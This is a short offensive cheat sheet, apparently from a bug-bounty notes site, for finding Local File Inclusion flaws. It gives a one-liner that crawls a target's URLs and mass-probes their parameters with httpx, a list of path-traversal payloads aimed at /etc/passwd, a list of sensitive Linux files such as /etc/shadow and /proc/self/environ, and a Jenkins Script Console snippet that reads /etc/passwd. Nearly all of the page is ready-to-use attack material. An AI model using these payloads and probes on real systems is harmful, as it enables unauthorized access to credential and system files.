👑Find LFI (CWE-98)

One-Liner for LFI 👍

cat target.txt | (gau || hakrawler || waybackurls || katana) |  grep "=" |  dedupe | httpx -silent -paths <your_wordlist>.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"

/etc/passwd
//etc//passwd
/etc/passwd%00
L2V0Yy9wYXNzd2Q=
../../../etc/passwd%00.png
../../../../../etc/passwd
....//....//....//etc/passwd 
/var/www/images/../../../etc/passwd 
/****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd

Local files for Linux :

/etc/passwd
/etc/shadow
/etc/shells
/etc/group
/etc/profile
/etc/hosts
/proc/self/environ
/proc/self/status
/proc/mounts
/bin/sh

If you have access to #jenkins dashboard use below Script Console cmd for poc:

def passwdFile = new File("/etc/passwd")

println passwdFile.text

PreviousFind DOM - XSS (CWE-79)NextLFI Cheatsheet

Last updated 1 year ago